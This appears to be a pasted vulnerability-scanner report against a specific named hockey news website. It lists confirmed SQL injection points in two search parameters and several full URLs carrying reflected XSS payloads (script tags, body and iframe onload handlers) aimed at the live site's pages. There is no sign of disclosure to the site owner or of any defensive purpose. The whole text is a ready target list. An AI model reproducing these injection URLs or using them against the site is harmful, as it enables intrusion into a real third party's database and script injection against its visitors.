hokejportal.net

1. SQLi, XSS |-->> http://hokejportal.net
2.  
3. ||| [High Possibility] SQL Injection
4.  
5. Severity : Critical
6. Confirmation : Confirmed
7. Detection Accuracy :
8. Vulnerable URL : http://www.hokejportal.net/index.php?d=s&p=search&s=%27&se=HÄ3adanA1 vA1raz
9. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
10. Parameter Name: s
11. Parameter Type: Querystring
12. Attack Pattern: %27
13.  
14. Severity : Critical
15. Confirmation : Confirmed
16. Detection Accuracy :
17. Vulnerable URL : http://www.hokejportal.net/index.php?d=s&p=search&s=1&se=%27
18. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
19. Parameter Name: se
20. Parameter Type: Querystring
21. Attack Pattern: %27
22.  
23. ||| XSS
24.  
25. http://www.hokejportal.net/?p='"--></style></script><script>alert(0x0009D7)</script>&subpage=fotozabava_galeria
26. http://www.hokejportal.net/index.php?p='"--></style></script><script>alert(0x000A27)</script>&subpage=statistiky
27. http://www.hokejportal.net/index.php?p=nhl&subpage='"--></style></script><script>alert(0x000A41)</script>
28. http://www.hokejportal.net/?p='"--></style></script><script>alert(0x0009D7)</script>&subpage=fotozabava_galeria
29. http://www.hokejportal.net/index.php?p='"--></style></script><script>alert(0x000A27)</script>&subpage=statistiky
30. http://www.hokejportal.net/index.php?action=fotozabava_hlasovanie&foto_diskusia_id=1224&hlas_foto_id=1224&p='"--></style></script><script>alert(0x000AE0)</script>&subpage=fotozabava_diskusia
31. http://www.hokejportal.net/index.php?q=><body onload=alert(9)>
32. http://www.hokejportal.net/index.php?d=s&p='"--></style></script><script>alert(0x000B1E)</script>&s=1&se=Hľadaný výraz
33. http://www.hokejportal.net/index.php?d=s&p=search&s=1&se='"--></style></script><script>alert(0x000B49)</script>
34. http://www.hokejportal.net/index.php?q='><iframe onload=alert(9)>